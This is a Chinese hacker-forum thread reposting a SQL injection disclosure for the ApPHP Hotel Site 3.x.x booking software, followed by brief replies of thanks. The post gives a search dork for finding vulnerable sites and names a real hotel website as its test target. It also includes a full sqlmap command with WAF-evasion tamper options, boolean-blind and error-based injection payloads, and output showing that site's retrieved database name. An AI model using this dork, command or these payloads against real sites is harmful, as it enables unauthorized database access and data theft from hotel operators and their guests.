查看: 80642|回复: 179

ApPHP Hotel Site 3.x.x注入漏洞

[复制链接]
  • TA的每日心情

    2024-11-13 20:06
  • 签到天数: 1628 天

    [LV.Master]伴坛终老

    发表于 2015-6-20 09:49:01 | 显示全部楼层 |阅读模式
    Description:
    ApPHP Hotel Site version 3.x.x suffers from a remote SQL injection vulnerability. Note that this finding houses site-specific data.

    [PHP] 纯文本查看 复制代码
    ApPHP Hotel site SQLi Vulnerability
     
    ApPHP Hotel Site is an Hotel application programs using PHP Language.
     
    title : ApPHP Hotel Site v.3.x.x.
    godork : ".php?pid=" "ApPHP Hotel Site"
     
    Affected version : v.3.x.x
    tested site : [url]http://www.hotelbran.com/index.php?pid=%27null[/url] 
    python sqlmap.py -u "http://www.hotelbran.com/index.php?pid=4" --current-db --dbms=mysql --no-cast --level 3 --risk 3 --threads 5 --tamper=between,randomcase,charencode --technique=BEUS --random-agent --beep --check-waf
     
    result :
    sqlmap identified the following injection points with a total of 251 HTTP(s) requests:
    ---
    Place: GET
    Parameter: pid
        Type: boolean-based blind
        Title: OR boolean-based blind - WHERE or HAVING clause
        Payload: pid=-6768' OR (8203=8203) AND 'Bjdy'='Bjdy
     
        Type: error-based
        Title: MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)
        Payload: pid=4' AND EXTRACTVALUE(2795,CONCAT(0x5c,0x71726a6b71,(SELECT (CASE WHEN (2795=2795) THEN 1 ELSE 0 END)),0x716f777071)) AND 'Ufik'='Ufik
    ---
    [15:16:35] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
    [15:16:35] [INFO] the back-end DBMS is MySQL
    web application technology: Apache, PHP 5.4.41
    back-end DBMS: MySQL 5.1
    [15:16:35] [INFO] fetching current database
    [15:16:36] [INFO] retrieved: hotelbra_db
    current database:    'hotelbra_db'
     
     
    + Credits :
    all of pemancing ghalau.... /^wishnusakti
    
    回复

    使用道具 举报

    该用户从未签到

    发表于 2015-6-27 08:22:54 | 显示全部楼层
    还是不错的哦,顶了
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-6-27 12:04:18 | 显示全部楼层
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-6-27 14:30:15 | 显示全部楼层
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2019-2-12 22:05
  • 签到天数: 2 天

    [LV.1]初来乍到

    发表于 2015-6-27 15:27:23 | 显示全部楼层
    支持中国红客联盟(ihonker.org)
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-6-28 06:07:14 | 显示全部楼层
    感谢楼主的分享~
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-6-29 20:45:40 | 显示全部楼层
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-6-30 02:00:58 | 显示全部楼层
    还是不错的哦,顶了
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-6-30 16:14:38 | 显示全部楼层
    学习学习技术,加油!
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-6-30 22:10:04 | 显示全部楼层
    支持中国红客联盟(ihonker.org)
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-11-22 14:09 , Processed in 0.031335 second(s), 12 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部